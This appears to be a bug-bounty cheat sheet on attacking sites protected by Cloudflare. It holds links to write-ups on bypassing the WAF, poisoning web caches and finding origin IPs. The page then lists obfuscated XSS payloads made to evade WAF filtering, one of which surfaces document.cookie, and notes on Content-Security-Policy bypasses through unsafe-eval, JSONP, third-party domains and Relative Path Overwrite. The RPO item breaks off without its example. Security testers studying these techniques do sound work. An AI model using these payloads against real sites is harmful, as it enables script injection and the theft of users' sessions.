CLOUDFLARE
Hello there, Its still undergoing updates.
Cloudflare
#Check Endpoints Check from Documentaion : https://github.com/cloudflare/cloudflare-docs
#Check for misconfigurations :
#Must check links to visit
https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9
https://medium.com/@the_harvester/bypassed-cloudflares-web-application-firewall-waf-44da57f3a1d3
https://ltsirkov.medium.com/cross-site-scripting-via-web-cache-poisoning-and-waf-bypass-6cb3412d9e11
https://codewithvamp.medium.com/bypassing-cloudflare-waf-with-host-address-manipulation-dd3508cce2f8
https://infosecwriteups.com/how-i-was-able-to-bypass-cloudflare-for-xss-e94cd827a5d6
https://medium.com/@mdnafeed3/bypassing-cloudflare-error-1015-you-are-being-rate-limited-f25f4e8f7bb2
https://royzsec.medium.com/cloudflare-bypass-leads-to-rxss-reflected-cross-site-scripting-in-microsoft-a76404669ee9
https://infosecwriteups.com/crlf-injection-xxx-how-was-it-possible-for-me-to-earn-a-bounty-with-the-cloudflare-waf-f581506f97f5
https://systemweakness.com/how-i-bypassed-cloudflare-waf-to-get-my-first-bug-f02dab3a2d10
https://systemweakness.com/automate-and-finds-the-ip-address-of-a-website-behind-cloudflare-45db99510b4b
#Some payloads
<svg%0Aonauxclick=0;[1].some(confirm)//
<svg onload=alert%26%230000000040"")>
<a/href=j a v asc ri pt:(a l e r t (1))>
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
"><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
"><onx=[] onmouseover=prompt(1)>
%2sscript%2ualert()%2s/script%2u -xss popup
<svg onload=alert%26%230000000040"1")>
"Onx=() onMouSeoVer=prompt(1)>"Onx=[] onMouSeoVer=prompt(1)>"//Onx=""//onfocus=prompt(1)>"//Onx=""//%01onfocus=prompt(1)>"%01onClick=prompt(1)>"%2501onclick=prompt(1)>"onClick="(prompt)(1)"Onclick="(prompt(1))"OnCliCk="(prompt1
)"Onclick="([1].map(confirm))
For more EDR and WAF
https://youtube.com/@LinuxbyVikku
Third Party Endpoints + ('unsafe-eval') Content-Security-Policy: script-src https://cdnjs.cloudflare.com 'unsafe-eval';
Third Party Endpoints + JSONP Content-Security-Policy: script-src 'self' https://google.com https://youtube.com; object-src 'none'; ">
Third Party Abuses Content-Security-Policy: default-src 'self’ http://facebook.com; Content-Security-Policy: connect-src http://facebook.com;
Bypass via RPO (Relative Path Overwrite) For example, if CSP allows the path https://example.com/scripts/react/, it can be bypassed as follows:
Last updated